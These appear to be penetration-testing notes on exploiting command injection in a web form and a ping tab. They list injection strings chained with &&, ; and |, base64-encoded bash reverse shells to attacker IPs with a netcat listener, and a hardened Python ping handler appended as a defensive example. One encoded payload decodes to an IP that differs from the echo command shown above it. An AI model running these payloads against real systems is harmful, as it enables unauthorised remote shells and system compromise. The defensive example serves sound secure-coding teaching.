Toolbar that allows running commands on the target
[1] If nothing happens, try Inspect Element and change the form method from "GET" to "POST"
[2] Echo a revshell and encode it in base64
echo "bash -i >& /dev/tcp/192.168.101.53/443 0>&1" | base64 > shell.txt
Start a netcat listener on Kali, port 443
#Inject this string in the toolbar; it decodes the base64-encoded revshell on the target and triggers a shell on port 443
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bash
[3] Tab that lets you run ping commands
Try using a double ampersand (&&) to chain commands after the address
127.0.0.1 && whoami
127.0.0.1 && cat /etc/hosts
#Variation: use a semicolon before the command
;id
;whoami
;cat /etc/hosts
#Variation: use a pipe (|) before the command to get RCE
127.0.0.1 | id
Revshell:
echo "bash -i >&/dev/tcp/192.168.54.200/443 0>&1" | base64 > shell.txt
cat shell.txt
nc -nvlp 443
127.0.0.1 | echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguNTQuMjAwLzQ0MyAwPiYxCg== | base64 -d | bash
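A hardened form of the ping tab's backend, as an added example (not code from the original notes): the field is parsed as an IP literal and ping is started from an argument list with no shell, so the &&, ; and | inputs above are rejected before any process runs. The function names and the `ping -c 1` arguments are assumptions.

```python
import ipaddress
import subprocess

# Constructed sample inputs: two valid addresses plus the injection
# strings listed in the notes above.
SAMPLE_INPUTS = ["127.0.0.1", "::1", "127.0.0.1 && whoami", ";id", "127.0.0.1 | id"]


def build_ping_argv(user_input: str) -> list[str]:
    """Return an argv list for ping, or raise ValueError.

    ip_address() accepts only a complete IPv4/IPv6 literal, so trailing
    shell syntax (&&, ;, |) fails to parse. This is an allow-list on the
    shape of the value, not a block-list of metacharacters.
    """
    addr = ipaddress.ip_address(user_input.strip())
    # Pass the canonical string of the parsed object, never the raw input.
    # "--" ends option parsing so the value cannot be read as a flag.
    return ["ping", "-c", "1", "--", str(addr)]


def run_ping(user_input: str) -> str:
    """Hypothetical handler for the ping tab: validate, then exec with no shell."""
    try:
        argv = build_ping_argv(user_input)
    except ValueError:
        return "rejected: not an IP address"
    # A list with shell=False (the default) goes straight to exec, so no
    # shell ever interprets the argument.
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return proc.stdout


def classify(inputs: list[str]) -> dict[str, bool]:
    """Map each input to True (accepted) or False (rejected); runs nothing."""
    verdicts = {}
    for item in inputs:
        try:
            build_ping_argv(item)
            verdicts[item] = True
        except ValueError:
            verdicts[item] = False
    return verdicts


if __name__ == "__main__":
    for value, ok in classify(SAMPLE_INPUTS).items():
        print(f"{value!r:25} -> {'accepted' if ok else 'rejected'}")
```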